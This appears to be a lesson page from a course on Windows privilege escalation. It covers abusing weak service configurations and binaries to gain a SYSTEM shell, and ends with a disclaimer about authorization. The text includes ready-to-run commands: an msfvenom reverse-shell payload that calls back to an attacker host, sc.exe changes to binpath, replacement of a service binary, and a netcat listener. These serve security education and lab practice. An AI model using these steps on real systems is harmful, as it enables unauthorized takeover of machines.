7 - Weak Service Permissions
Topics
Introduction to the Windows Shells
Windows Permissions
Reverse Shells in Windows
SeImpersonatePrivilege Exploitation
On Cross Compilation
Windows Services
Weak Service Permissions
Unquoted Service Path
DLL Hijacking
Always Install Elevated
Files with Sensitive Data
Windows Hashes
Stored Credentials and the Windows Vault
Scheduled Task
Critical Registry Paths
Useful Tools
AMSI Bypass
Weak Permissions on Service Configuration
Weak service configurations and binaries present significant security risks, infact service configurations can be altered if a user or group has sufficient permissions.
Viewing Service Configuration
Use the sc.exe
command to check a service's configuration:
sc.exe qc SimpleService
Sample Output:
SERVICE_NAME: SimpleService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Users\Quickemu\Downloads\simpleService.exe
SERVICE_START_NAME : LocalSystem
Checking Permissions with AccessChk
AccessChk is a Microsoft utility that permits to know what kind of accesses specific users or groups have to resources including files, directories, Registry keys, global objects and Windows services. AccessChk quickly answers these questions with an intuitive interface and output. (Download it from here)
Than, using accesschk64
we can verify permissions over a service:
.\accesschk64.exe /accepteula -uwcqv SimpleService
Sample Output:
SimpleService
RW NT AUTHORITY\SYSTEM
SERVICE_ALL_ACCESS
RW BUILTIN\Administrators
SERVICE_ALL_ACCESS
The output shows the permissions for users/groups. "SERVICE_ALL_ACCESS" indicates full control over the service as System and Administrators user.
After checking the configuration, the goal is to change the path and replace it with the malicious one, stop the service and run it again.
Exploitation Steps
Create a Malicious Executable Generate a reverse shell payload:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.122.1 LPORT=7777 -f exe -o malicious.exe
Modify the Service Executable Path Change the
binpath
to point to the malicious binary:sc.exe config SimpleService binpath="C:\Users\Quickemu\Downloads\malicious.exe"
Go into listening mode with netcat on linux attacker machine (we'll obtain the connection after next step):
nc -lvnp 7777
Restart the Service Restart the service to execute the malicious binary:
sc.exe stop SimpleService
sc.exe start SimpleService
Weak Permissions on Service Binary
If the service binary itself has weak file permissions, it can be overwritten with a malicious executable.
Identifying Service Binaries
List the binary paths of running services:
Get-CimInstance -ClassName win32_service | Select Name, State, PathName | Where-Object {$_.State -like 'Running'}
Checking Binary Permissions with ICACLS
Use the icacls
utility to view file permissions:
icacls .\simpleService.exe
Sample Output:
.\simpleService.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
QUICKEM-5QLQQP9\Quickemu:(F)
If the current user has "Full Control" ((F)
), they can overwrite the binary.
Exploitation Steps
Generate and Transfer a Malicious Binary
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.122.1 LPORT=7777 -f exe -o malicious.exe
Backup and Replace the Service Binary
cp .\simpleService.exe .\simpleService.exe.bkp cp .\malicious.exe .\simpleService.exe
Go into listening mode with netcat on linux attacker machine (we'll obtain the connection after next step):
nc -lvnp 7777
Restart the Service
sc.exe stop SimpleService sc.exe start SimpleService
Service Enumeration with winPEAS
winPEAS
is a tool used to enumerate potential misconfigurations, including weak service permissions.
Downloading winPEAS
Download the binary:
wget https://github.com/peass-ng/PEASS-ng/releases/download/20241011-2e37ba11/winPEASx64.exe
Running winPEAS to Enumerate Services
Use the servicesinfo
option to gather information about services:
.\winPEASx64.exe quiet servicesinfo
winPEAS
will display information about services, including configuration details, permissions, and potential vulnerabilities.
Other Resources
Windows Privilege Escalation Awesome Scripts: https://github.com/peass-ng/PEASS-ng/...
Weak Service Permissions: https://www.ired.team/offensive-secur...
Windows local privilege escalation: https://xorond.com/posts/2021/04/wind...
Service Misconfiguration: https://www.narycyber.com/posts/privi...
Weak Service Permissions: https://juggernaut-sec.com/weak-servi...
Insecure Service Permissions: https://akimbocore.com/article/privil...
Disclaimer
❗ Never use tools and techniques on real IP addresses, hosts or networks without proper authorization!❗
Last updated